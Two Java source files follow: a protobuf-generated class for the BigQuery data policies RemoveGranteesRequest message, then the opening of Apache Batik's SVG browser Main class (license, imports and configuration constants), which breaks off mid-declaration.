@@protoc_insertion_point(message_implements:google.cloud.bigquery.datapolicies.v2beta1.RemoveGranteesRequest) RemoveGranteesRequestOrBuilder { private static final long serialVersionUID = 0L; // Use RemoveGranteesRequest.newBuilder() to construct. 
private RemoveGranteesRequest(com.google.protobuf.GeneratedMessageV3.Builder<?> builder) { super(builder); } private RemoveGranteesRequest() { dataPolicy_ = ""; grantees_ = com.google.protobuf.LazyStringArrayList.emptyList(); } @java.lang.Override @SuppressWarnings({"unused"}) protected java.lang.Object newInstance(UnusedPrivateParameter unused) { return new RemoveGranteesRequest(); } public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloud.bigquery.datapolicies.v2beta1.DataPolicyProto .internal_static_google_cloud_bigquery_datapolicies_v2beta1_RemoveGranteesRequest_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.cloud.bigquery.datapolicies.v2beta1.DataPolicyProto .internal_static_google_cloud_bigquery_datapolicies_v2beta1_RemoveGranteesRequest_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloud.bigquery.datapolicies.v2beta1.RemoveGranteesRequest.class, com.google.cloud.bigquery.datapolicies.v2beta1.RemoveGranteesRequest.Builder.class); } public static final int DATA_POLICY_FIELD_NUMBER = 1; @SuppressWarnings("serial") private volatile java.lang.Object dataPolicy_ = ""; /** * * * <pre> * Required. Resource name of this data policy, in the format of * `projects/{project_number}/locations/{location_id}/dataPolicies/{data_policy_id}`. * </pre> * * <code> * string data_policy = 1 [(.google.api.field_behavior) = REQUIRED, (.google.api.resource_reference) = { ... } * </code> * * @return The dataPolicy. */ @java.lang.Override public java.lang.String getDataPolicy() { java.lang.Object ref = dataPolicy_; if (ref instanceof java.lang.String) { return (java.lang.String) ref; } else { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); dataPolicy_ = s; return s; } } /** * * * <pre> * Required. 
Resource name of this data policy, in the format of * `projects/{project_number}/locations/{location_id}/dataPolicies/{data_policy_id}`. * </pre> * * <code> * string data_policy = 1 [(.google.api.field_behavior) = REQUIRED, (.google.api.resource_reference) = { ... } * </code> * * @return The bytes for dataPolicy. */ @java.lang.Override public com.google.protobuf.ByteString getDataPolicyBytes() { java.lang.Object ref = dataPolicy_; if (ref instanceof java.lang.String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); dataPolicy_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } public static final int GRANTEES_FIELD_NUMBER = 2; @SuppressWarnings("serial") private com.google.protobuf.LazyStringArrayList grantees_ = com.google.protobuf.LazyStringArrayList.emptyList(); /** * * * <pre> * Required. IAM principal that should be revoked from Fine Grained Access to * the underlying data goverened by the data policy. The target data policy is * determined by the `data_policy` field. * * Uses the [IAM V2 principal * syntax](https://cloud.google.com/iam/docs/principal-identifiers#v2). * Supported principal types: * * * User * * Group * * Service account * </pre> * * <code>repeated string grantees = 2 [(.google.api.field_behavior) = REQUIRED];</code> * * @return A list containing the grantees. */ public com.google.protobuf.ProtocolStringList getGranteesList() { return grantees_; } /** * * * <pre> * Required. IAM principal that should be revoked from Fine Grained Access to * the underlying data goverened by the data policy. The target data policy is * determined by the `data_policy` field. * * Uses the [IAM V2 principal * syntax](https://cloud.google.com/iam/docs/principal-identifiers#v2). * Supported principal types: * * * User * * Group * * Service account * </pre> * * <code>repeated string grantees = 2 [(.google.api.field_behavior) = REQUIRED];</code> * * @return The count of grantees. 
*/ public int getGranteesCount() { return grantees_.size(); } /** * * * <pre> * Required. IAM principal that should be revoked from Fine Grained Access to * the underlying data goverened by the data policy. The target data policy is * determined by the `data_policy` field. * * Uses the [IAM V2 principal * syntax](https://cloud.google.com/iam/docs/principal-identifiers#v2). * Supported principal types: * * * User * * Group * * Service account * </pre> * * <code>repeated string grantees = 2 [(.google.api.field_behavior) = REQUIRED];</code> * * @param index The index of the element to return. * @return The grantees at the given index. */ public java.lang.String getGrantees(int index) { return grantees_.get(index); } /** * * * <pre> * Required. IAM principal that should be revoked from Fine Grained Access to * the underlying data goverened by the data policy. The target data policy is * determined by the `data_policy` field. * * Uses the [IAM V2 principal * syntax](https://cloud.google.com/iam/docs/principal-identifiers#v2). * Supported principal types: * * * User * * Group * * Service account * </pre> * * <code>repeated string grantees = 2 [(.google.api.field_behavior) = REQUIRED];</code> * * @param index The index of the value to return. * @return The bytes of the grantees at the given index. 
*/ public com.google.protobuf.ByteString getGranteesBytes(int index) { return grantees_.getByteString(index); } private byte memoizedIsInitialized = -1; @java.lang.Override public final boolean isInitialized() { byte isInitialized = memoizedIsInitialized; if (isInitialized == 1) return true; if (isInitialized == 0) return false; memoizedIsInitialized = 1; return true; } @java.lang.Override public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(dataPolicy_)) { com.google.protobuf.GeneratedMessageV3.writeString(output, 1, dataPolicy_); } for (int i = 0; i < grantees_.size(); i++) { com.google.protobuf.GeneratedMessageV3.writeString(output, 2, grantees_.getRaw(i)); } getUnknownFields().writeTo(output); } @java.lang.Override public int getSerializedSize() { int size = memoizedSize; if (size != -1) return size; size = 0; if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(dataPolicy_)) { size += com.google.protobuf.GeneratedMessageV3.computeStringSize(1, dataPolicy_); } { int dataSize = 0; for (int i = 0; i < grantees_.size(); i++) { dataSize += computeStringSizeNoTag(grantees_.getRaw(i)); } size += dataSize; size += 1 * getGranteesList().size(); } size += getUnknownFields().getSerializedSize(); memoizedSize = size; return size; } @java.lang.Override public boolean equals(final java.lang.Object obj) { if (obj == this) { return true; } if (!(obj instanceof com.google.cloud.bigquery.datapolicies.v2beta1.RemoveGranteesRequest)) { return super.equals(obj); } com.google.cloud.bigquery.datapolicies.v2beta1.RemoveGranteesRequest other = (com.google.cloud.bigquery.datapolicies.v2beta1.RemoveGranteesRequest) obj; if (!getDataPolicy().equals(other.getDataPolicy())) return false; if (!getGranteesList().equals(other.getGranteesList())) return false; if (!getUnknownFields().equals(other.getUnknownFields())) return false; return true; } @java.lang.Override public int hashCode() { 
if (memoizedHashCode != 0) { return memoizedHashCode; } int hash = 41; hash = (19 * hash) + getDescriptor().hashCode(); hash = (37 * hash) + DATA_POLICY_FIELD_NUMBER; hash = (53 * hash) + getDataPolicy().hashCode(); if (getGranteesCount() > 0) { hash = (37 * hash) + GRANTEES_FIELD_NUMBER; hash = (53 * hash) + getGranteesList().hashCode(); } hash = (29 * hash) + getUnknownFields().hashCode(); memoizedHashCode = hash; return hash; } public static com.google.cloud.bigquery.datapolicies.v2beta1.RemoveGranteesRequest parseFrom( java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.bigquery.datapolicies.v2beta1.RemoveGranteesRequest parseFrom( java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.bigquery.datapolicies.v2beta1.RemoveGranteesRequest parseFrom( com.google.protobuf.ByteString data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.bigquery.datapolicies.v2beta1.RemoveGranteesRequest parseFrom( com.google.protobuf.ByteString data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.bigquery.datapolicies.v2beta1.RemoveGranteesRequest parseFrom( byte[] data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.bigquery.datapolicies.v2beta1.RemoveGranteesRequest parseFrom( byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static 
com.google.cloud.bigquery.datapolicies.v2beta1.RemoveGranteesRequest parseFrom( java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.cloud.bigquery.datapolicies.v2beta1.RemoveGranteesRequest parseFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloud.bigquery.datapolicies.v2beta1.RemoveGranteesRequest parseDelimitedFrom(java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException(PARSER, input); } public static com.google.cloud.bigquery.datapolicies.v2beta1.RemoveGranteesRequest parseDelimitedFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloud.bigquery.datapolicies.v2beta1.RemoveGranteesRequest parseFrom( com.google.protobuf.CodedInputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.cloud.bigquery.datapolicies.v2beta1.RemoveGranteesRequest parseFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } @java.lang.Override public Builder newBuilderForType() { return newBuilder(); } public static Builder newBuilder() { return DEFAULT_INSTANCE.toBuilder(); } public static Builder newBuilder( com.google.cloud.bigquery.datapolicies.v2beta1.RemoveGranteesRequest prototype) { return 
DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); } @java.lang.Override public Builder toBuilder() { return this == DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this); } @java.lang.Override protected Builder newBuilderForType(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { Builder builder = new Builder(parent); return builder; } /** * * * <pre> * Request message for the RemoveGrantees method. * </pre> * * Protobuf type {@code google.cloud.bigquery.datapolicies.v2beta1.RemoveGranteesRequest} */ public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder<Builder> implements // @@protoc_insertion_point(builder_implements:google.cloud.bigquery.datapolicies.v2beta1.RemoveGranteesRequest) com.google.cloud.bigquery.datapolicies.v2beta1.RemoveGranteesRequestOrBuilder { public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloud.bigquery.datapolicies.v2beta1.DataPolicyProto .internal_static_google_cloud_bigquery_datapolicies_v2beta1_RemoveGranteesRequest_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.cloud.bigquery.datapolicies.v2beta1.DataPolicyProto .internal_static_google_cloud_bigquery_datapolicies_v2beta1_RemoveGranteesRequest_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloud.bigquery.datapolicies.v2beta1.RemoveGranteesRequest.class, com.google.cloud.bigquery.datapolicies.v2beta1.RemoveGranteesRequest.Builder.class); } // Construct using // com.google.cloud.bigquery.datapolicies.v2beta1.RemoveGranteesRequest.newBuilder() private Builder() {} private Builder(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { super(parent); } @java.lang.Override public Builder clear() { super.clear(); bitField0_ = 0; dataPolicy_ = ""; grantees_ = com.google.protobuf.LazyStringArrayList.emptyList(); return this; } @java.lang.Override public 
com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { return com.google.cloud.bigquery.datapolicies.v2beta1.DataPolicyProto .internal_static_google_cloud_bigquery_datapolicies_v2beta1_RemoveGranteesRequest_descriptor; } @java.lang.Override public com.google.cloud.bigquery.datapolicies.v2beta1.RemoveGranteesRequest getDefaultInstanceForType() { return com.google.cloud.bigquery.datapolicies.v2beta1.RemoveGranteesRequest .getDefaultInstance(); } @java.lang.Override public com.google.cloud.bigquery.datapolicies.v2beta1.RemoveGranteesRequest build() { com.google.cloud.bigquery.datapolicies.v2beta1.RemoveGranteesRequest result = buildPartial(); if (!result.isInitialized()) { throw newUninitializedMessageException(result); } return result; } @java.lang.Override public com.google.cloud.bigquery.datapolicies.v2beta1.RemoveGranteesRequest buildPartial() { com.google.cloud.bigquery.datapolicies.v2beta1.RemoveGranteesRequest result = new com.google.cloud.bigquery.datapolicies.v2beta1.RemoveGranteesRequest(this); if (bitField0_ != 0) { buildPartial0(result); } onBuilt(); return result; } private void buildPartial0( com.google.cloud.bigquery.datapolicies.v2beta1.RemoveGranteesRequest result) { int from_bitField0_ = bitField0_; if (((from_bitField0_ & 0x00000001) != 0)) { result.dataPolicy_ = dataPolicy_; } if (((from_bitField0_ & 0x00000002) != 0)) { grantees_.makeImmutable(); result.grantees_ = grantees_; } } @java.lang.Override public Builder clone() { return super.clone(); } @java.lang.Override public Builder setField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.setField(field, value); } @java.lang.Override public Builder clearField(com.google.protobuf.Descriptors.FieldDescriptor field) { return super.clearField(field); } @java.lang.Override public Builder clearOneof(com.google.protobuf.Descriptors.OneofDescriptor oneof) { return super.clearOneof(oneof); } @java.lang.Override public Builder setRepeatedField( 
com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { return super.setRepeatedField(field, index, value); } @java.lang.Override public Builder addRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.addRepeatedField(field, value); } @java.lang.Override public Builder mergeFrom(com.google.protobuf.Message other) { if (other instanceof com.google.cloud.bigquery.datapolicies.v2beta1.RemoveGranteesRequest) { return mergeFrom( (com.google.cloud.bigquery.datapolicies.v2beta1.RemoveGranteesRequest) other); } else { super.mergeFrom(other); return this; } } public Builder mergeFrom( com.google.cloud.bigquery.datapolicies.v2beta1.RemoveGranteesRequest other) { if (other == com.google.cloud.bigquery.datapolicies.v2beta1.RemoveGranteesRequest .getDefaultInstance()) return this; if (!other.getDataPolicy().isEmpty()) { dataPolicy_ = other.dataPolicy_; bitField0_ |= 0x00000001; onChanged(); } if (!other.grantees_.isEmpty()) { if (grantees_.isEmpty()) { grantees_ = other.grantees_; bitField0_ |= 0x00000002; } else { ensureGranteesIsMutable(); grantees_.addAll(other.grantees_); } onChanged(); } this.mergeUnknownFields(other.getUnknownFields()); onChanged(); return this; } @java.lang.Override public final boolean isInitialized() { return true; } @java.lang.Override public Builder mergeFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { if (extensionRegistry == null) { throw new java.lang.NullPointerException(); } try { boolean done = false; while (!done) { int tag = input.readTag(); switch (tag) { case 0: done = true; break; case 10: { dataPolicy_ = input.readStringRequireUtf8(); bitField0_ |= 0x00000001; break; } // case 10 case 18: { java.lang.String s = input.readStringRequireUtf8(); ensureGranteesIsMutable(); grantees_.add(s); break; } // case 18 default: { if (!super.parseUnknownField(input, 
extensionRegistry, tag)) { done = true; // was an endgroup tag } break; } // default: } // switch (tag) } // while (!done) } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.unwrapIOException(); } finally { onChanged(); } // finally return this; } private int bitField0_; private java.lang.Object dataPolicy_ = ""; /** * * * <pre> * Required. Resource name of this data policy, in the format of * `projects/{project_number}/locations/{location_id}/dataPolicies/{data_policy_id}`. * </pre> * * <code> * string data_policy = 1 [(.google.api.field_behavior) = REQUIRED, (.google.api.resource_reference) = { ... } * </code> * * @return The dataPolicy. */ public java.lang.String getDataPolicy() { java.lang.Object ref = dataPolicy_; if (!(ref instanceof java.lang.String)) { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); dataPolicy_ = s; return s; } else { return (java.lang.String) ref; } } /** * * * <pre> * Required. Resource name of this data policy, in the format of * `projects/{project_number}/locations/{location_id}/dataPolicies/{data_policy_id}`. * </pre> * * <code> * string data_policy = 1 [(.google.api.field_behavior) = REQUIRED, (.google.api.resource_reference) = { ... } * </code> * * @return The bytes for dataPolicy. */ public com.google.protobuf.ByteString getDataPolicyBytes() { java.lang.Object ref = dataPolicy_; if (ref instanceof String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); dataPolicy_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } /** * * * <pre> * Required. Resource name of this data policy, in the format of * `projects/{project_number}/locations/{location_id}/dataPolicies/{data_policy_id}`. * </pre> * * <code> * string data_policy = 1 [(.google.api.field_behavior) = REQUIRED, (.google.api.resource_reference) = { ... } * </code> * * @param value The dataPolicy to set. 
* @return This builder for chaining. */ public Builder setDataPolicy(java.lang.String value) { if (value == null) { throw new NullPointerException(); } dataPolicy_ = value; bitField0_ |= 0x00000001; onChanged(); return this; } /** * * * <pre> * Required. Resource name of this data policy, in the format of * `projects/{project_number}/locations/{location_id}/dataPolicies/{data_policy_id}`. * </pre> * * <code> * string data_policy = 1 [(.google.api.field_behavior) = REQUIRED, (.google.api.resource_reference) = { ... } * </code> * * @return This builder for chaining. */ public Builder clearDataPolicy() { dataPolicy_ = getDefaultInstance().getDataPolicy(); bitField0_ = (bitField0_ & ~0x00000001); onChanged(); return this; } /** * * * <pre> * Required. Resource name of this data policy, in the format of * `projects/{project_number}/locations/{location_id}/dataPolicies/{data_policy_id}`. * </pre> * * <code> * string data_policy = 1 [(.google.api.field_behavior) = REQUIRED, (.google.api.resource_reference) = { ... } * </code> * * @param value The bytes for dataPolicy to set. * @return This builder for chaining. */ public Builder setDataPolicyBytes(com.google.protobuf.ByteString value) { if (value == null) { throw new NullPointerException(); } checkByteStringIsUtf8(value); dataPolicy_ = value; bitField0_ |= 0x00000001; onChanged(); return this; } private com.google.protobuf.LazyStringArrayList grantees_ = com.google.protobuf.LazyStringArrayList.emptyList(); private void ensureGranteesIsMutable() { if (!grantees_.isModifiable()) { grantees_ = new com.google.protobuf.LazyStringArrayList(grantees_); } bitField0_ |= 0x00000002; } /** * * * <pre> * Required. IAM principal that should be revoked from Fine Grained Access to * the underlying data goverened by the data policy. The target data policy is * determined by the `data_policy` field. * * Uses the [IAM V2 principal * syntax](https://cloud.google.com/iam/docs/principal-identifiers#v2). 
* Supported principal types: * * * User * * Group * * Service account * </pre> * * <code>repeated string grantees = 2 [(.google.api.field_behavior) = REQUIRED];</code> * * @return A list containing the grantees. */ public com.google.protobuf.ProtocolStringList getGranteesList() { grantees_.makeImmutable(); return grantees_; } /** * * * <pre> * Required. IAM principal that should be revoked from Fine Grained Access to * the underlying data goverened by the data policy. The target data policy is * determined by the `data_policy` field. * * Uses the [IAM V2 principal * syntax](https://cloud.google.com/iam/docs/principal-identifiers#v2). * Supported principal types: * * * User * * Group * * Service account * </pre> * * <code>repeated string grantees = 2 [(.google.api.field_behavior) = REQUIRED];</code> * * @return The count of grantees. */ public int getGranteesCount() { return grantees_.size(); } /** * * * <pre> * Required. IAM principal that should be revoked from Fine Grained Access to * the underlying data goverened by the data policy. The target data policy is * determined by the `data_policy` field. * * Uses the [IAM V2 principal * syntax](https://cloud.google.com/iam/docs/principal-identifiers#v2). * Supported principal types: * * * User * * Group * * Service account * </pre> * * <code>repeated string grantees = 2 [(.google.api.field_behavior) = REQUIRED];</code> * * @param index The index of the element to return. * @return The grantees at the given index. */ public java.lang.String getGrantees(int index) { return grantees_.get(index); } /** * * * <pre> * Required. IAM principal that should be revoked from Fine Grained Access to * the underlying data goverened by the data policy. The target data policy is * determined by the `data_policy` field. * * Uses the [IAM V2 principal * syntax](https://cloud.google.com/iam/docs/principal-identifiers#v2). 
* Supported principal types: * * * User * * Group * * Service account * </pre> * * <code>repeated string grantees = 2 [(.google.api.field_behavior) = REQUIRED];</code> * * @param index The index of the value to return. * @return The bytes of the grantees at the given index. */ public com.google.protobuf.ByteString getGranteesBytes(int index) { return grantees_.getByteString(index); } /** * * * <pre> * Required. IAM principal that should be revoked from Fine Grained Access to * the underlying data goverened by the data policy. The target data policy is * determined by the `data_policy` field. * * Uses the [IAM V2 principal * syntax](https://cloud.google.com/iam/docs/principal-identifiers#v2). * Supported principal types: * * * User * * Group * * Service account * </pre> * * <code>repeated string grantees = 2 [(.google.api.field_behavior) = REQUIRED];</code> * * @param index The index to set the value at. * @param value The grantees to set. * @return This builder for chaining. */ public Builder setGrantees(int index, java.lang.String value) { if (value == null) { throw new NullPointerException(); } ensureGranteesIsMutable(); grantees_.set(index, value); bitField0_ |= 0x00000002; onChanged(); return this; } /** * * * <pre> * Required. IAM principal that should be revoked from Fine Grained Access to * the underlying data goverened by the data policy. The target data policy is * determined by the `data_policy` field. * * Uses the [IAM V2 principal * syntax](https://cloud.google.com/iam/docs/principal-identifiers#v2). * Supported principal types: * * * User * * Group * * Service account * </pre> * * <code>repeated string grantees = 2 [(.google.api.field_behavior) = REQUIRED];</code> * * @param value The grantees to add. * @return This builder for chaining. 
*/ public Builder addGrantees(java.lang.String value) { if (value == null) { throw new NullPointerException(); } ensureGranteesIsMutable(); grantees_.add(value); bitField0_ |= 0x00000002; onChanged(); return this; } /** * * * <pre> * Required. IAM principal that should be revoked from Fine Grained Access to * the underlying data goverened by the data policy. The target data policy is * determined by the `data_policy` field. * * Uses the [IAM V2 principal * syntax](https://cloud.google.com/iam/docs/principal-identifiers#v2). * Supported principal types: * * * User * * Group * * Service account * </pre> * * <code>repeated string grantees = 2 [(.google.api.field_behavior) = REQUIRED];</code> * * @param values The grantees to add. * @return This builder for chaining. */ public Builder addAllGrantees(java.lang.Iterable<java.lang.String> values) { ensureGranteesIsMutable(); com.google.protobuf.AbstractMessageLite.Builder.addAll(values, grantees_); bitField0_ |= 0x00000002; onChanged(); return this; } /** * * * <pre> * Required. IAM principal that should be revoked from Fine Grained Access to * the underlying data goverened by the data policy. The target data policy is * determined by the `data_policy` field. * * Uses the [IAM V2 principal * syntax](https://cloud.google.com/iam/docs/principal-identifiers#v2). * Supported principal types: * * * User * * Group * * Service account * </pre> * * <code>repeated string grantees = 2 [(.google.api.field_behavior) = REQUIRED];</code> * * @return This builder for chaining. */ public Builder clearGrantees() { grantees_ = com.google.protobuf.LazyStringArrayList.emptyList(); bitField0_ = (bitField0_ & ~0x00000002); ; onChanged(); return this; } /** * * * <pre> * Required. IAM principal that should be revoked from Fine Grained Access to * the underlying data goverened by the data policy. The target data policy is * determined by the `data_policy` field. 
* * Uses the [IAM V2 principal * syntax](https://cloud.google.com/iam/docs/principal-identifiers#v2). * Supported principal types: * * * User * * Group * * Service account * </pre> * * <code>repeated string grantees = 2 [(.google.api.field_behavior) = REQUIRED];</code> * * @param value The bytes of the grantees to add. * @return This builder for chaining. */ public Builder addGranteesBytes(com.google.protobuf.ByteString value) { if (value == null) { throw new NullPointerException(); } checkByteStringIsUtf8(value); ensureGranteesIsMutable(); grantees_.add(value); bitField0_ |= 0x00000002; onChanged(); return this; } @java.lang.Override public final Builder setUnknownFields(final com.google.protobuf.UnknownFieldSet unknownFields) { return super.setUnknownFields(unknownFields); } @java.lang.Override public final Builder mergeUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.mergeUnknownFields(unknownFields); } // @@protoc_insertion_point(builder_scope:google.cloud.bigquery.datapolicies.v2beta1.RemoveGranteesRequest) } // @@protoc_insertion_point(class_scope:google.cloud.bigquery.datapolicies.v2beta1.RemoveGranteesRequest) private static final com.google.cloud.bigquery.datapolicies.v2beta1.RemoveGranteesRequest DEFAULT_INSTANCE; static { DEFAULT_INSTANCE = new com.google.cloud.bigquery.datapolicies.v2beta1.RemoveGranteesRequest(); } public static com.google.cloud.bigquery.datapolicies.v2beta1.RemoveGranteesRequest getDefaultInstance() { return DEFAULT_INSTANCE; } private static final com.google.protobuf.Parser<RemoveGranteesRequest> PARSER = new com.google.protobuf.AbstractParser<RemoveGranteesRequest>() { @java.lang.Override public RemoveGranteesRequest parsePartialFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { Builder builder = newBuilder(); try { builder.mergeFrom(input, extensionRegistry); } catch 
(com.google.protobuf.InvalidProtocolBufferException e) { throw e.setUnfinishedMessage(builder.buildPartial()); } catch (com.google.protobuf.UninitializedMessageException e) { throw e.asInvalidProtocolBufferException().setUnfinishedMessage(builder.buildPartial()); } catch (java.io.IOException e) { throw new com.google.protobuf.InvalidProtocolBufferException(e) .setUnfinishedMessage(builder.buildPartial()); } return builder.buildPartial(); } }; public static com.google.protobuf.Parser<RemoveGranteesRequest> parser() { return PARSER; } @java.lang.Override public com.google.protobuf.Parser<RemoveGranteesRequest> getParserForType() { return PARSER; } @java.lang.Override public com.google.cloud.bigquery.datapolicies.v2beta1.RemoveGranteesRequest getDefaultInstanceForType() { return DEFAULT_INSTANCE; } }
apache/xmlgraphics-batik
35,770
batik-svgbrowser/src/main/java/org/apache/batik/apps/svgbrowser/Main.java
/* Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements. See the NOTICE file distributed with this work for additional information regarding copyright ownership. The ASF licenses this file to You under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. */ package org.apache.batik.apps.svgbrowser; import java.awt.BorderLayout; import java.awt.Dimension; import java.awt.Font; import java.awt.event.ActionEvent; import java.io.BufferedReader; import java.io.File; import java.io.FileWriter; import java.io.InputStreamReader; import java.io.IOException; import java.io.Reader; import java.io.UnsupportedEncodingException; import java.io.Writer; import java.net.Authenticator; import java.net.URLDecoder; import java.net.URLEncoder; import java.nio.charset.Charset; import java.util.HashMap; import java.util.LinkedList; import java.util.List; import java.util.Locale; import java.util.Map; import java.util.ResourceBundle; import java.util.StringTokenizer; import java.util.Vector; import java.lang.reflect.InvocationHandler; import java.lang.reflect.Method; import java.lang.reflect.Proxy; import javax.swing.AbstractAction; import javax.swing.Action; import javax.swing.ImageIcon; import javax.swing.JOptionPane; import javax.swing.JProgressBar; import javax.swing.UIManager; import javax.swing.plaf.FontUIResource; import org.apache.batik.swing.JSVGCanvas; import org.apache.batik.swing.gvt.GVTTreeRendererAdapter; import org.apache.batik.swing.gvt.GVTTreeRendererEvent; import 
org.apache.batik.swing.svg.GVTTreeBuilderAdapter; import org.apache.batik.swing.svg.GVTTreeBuilderEvent; import org.apache.batik.swing.svg.SVGDocumentLoaderAdapter; import org.apache.batik.swing.svg.SVGDocumentLoaderEvent; import org.apache.batik.util.ApplicationSecurityEnforcer; import org.apache.batik.util.Platform; import org.apache.batik.util.ParsedURL; import org.apache.batik.util.SVGConstants; import org.apache.batik.util.XMLResourceDescriptor; import org.apache.batik.util.resources.ResourceManager; /** * This class contains the main method of an SVG viewer. * * @author <a href="mailto:stephane@hillion.org">Stephane Hillion</a> * @version $Id$ */ public class Main implements Application { /** * Extension used in addition to the scriptType value * to read from the PreferenceManager whether or not the * scriptType can be loaded. */ public static final String UNKNOWN_SCRIPT_TYPE_LOAD_KEY_EXTENSION = ".load"; /** * User home property */ public static final String PROPERTY_USER_HOME = "user.home"; /** * System property for specifying an additional policy file. 
*/ public static final String PROPERTY_JAVA_SECURITY_POLICY = "java.security.policy"; /** * Batik configuration sub-directory */ public static final String BATIK_CONFIGURATION_SUBDIRECTORY = ".batik"; /** * Name of the Squiggle configuration file */ public static final String SQUIGGLE_CONFIGURATION_FILE = "preferences.xml"; /** * Name of the Squiggle policy file */ public static final String SQUIGGLE_POLICY_FILE = "__svgbrowser.policy"; /** * Entry for granting network access to scripts */ public static final String POLICY_GRANT_SCRIPT_NETWORK_ACCESS = "grant {\n permission java.net.SocketPermission \"*\", \"listen, connect, resolve, accept\";\n};\n\n"; /** * Entry for granting file system access to scripts */ public static final String POLICY_GRANT_SCRIPT_FILE_ACCESS = "grant {\n permission java.io.FilePermission \"<<ALL FILES>>\", \"read\";\n};\n\n"; /** * Entry for the list of recently visited URI */ public static final String PREFERENCE_KEY_VISITED_URI_LIST = "preference.key.visited.uri.list"; /** * Entry for the maximum number of last visited URIs */ public static final String PREFERENCE_KEY_VISITED_URI_LIST_LENGTH = "preference.key.visited.uri.list.length"; /** * List of separators between URI values in the preference * file */ public static final String URI_SEPARATOR = " "; /** * Default font-family value. */ public static final String DEFAULT_DEFAULT_FONT_FAMILY = "Arial, Helvetica, sans-serif"; /** * SVG initialization file, used to trigger loading of most of * the Batik classes */ public static final String SVG_INITIALIZATION = "resources/init.svg"; /** * Stores the initialization file URI */ protected String svgInitializationURI; /** * Creates a viewer frame and shows it.. * @param args The command-line arguments. 
*/ public static void main(String[] args) { new Main(args); } /** * The gui resources file name */ public static final String RESOURCES = "org.apache.batik.apps.svgbrowser.resources.Main"; /** * URL for Squiggle's security policy file */ public static final String SQUIGGLE_SECURITY_POLICY = "org/apache/batik/apps/svgbrowser/resources/svgbrowser.policy"; /** * The resource bundle */ protected static ResourceBundle bundle; /** * The resource manager */ protected static ResourceManager resources; static { bundle = ResourceBundle.getBundle(RESOURCES, Locale.getDefault()); resources = new ResourceManager(bundle); } /** * The frame's icon. */ protected static ImageIcon frameIcon = new ImageIcon (Main.class.getResource(resources.getString("Frame.icon"))); /** * The preference manager. */ protected XMLPreferenceManager preferenceManager; /** * Maximum number of recently visited URIs */ public static final int MAX_VISITED_URIS = 10; /** * The array of last visited URIs */ protected Vector lastVisited = new Vector(); /** * The actual allowed maximum number of last visited URIs */ protected int maxVisitedURIs = 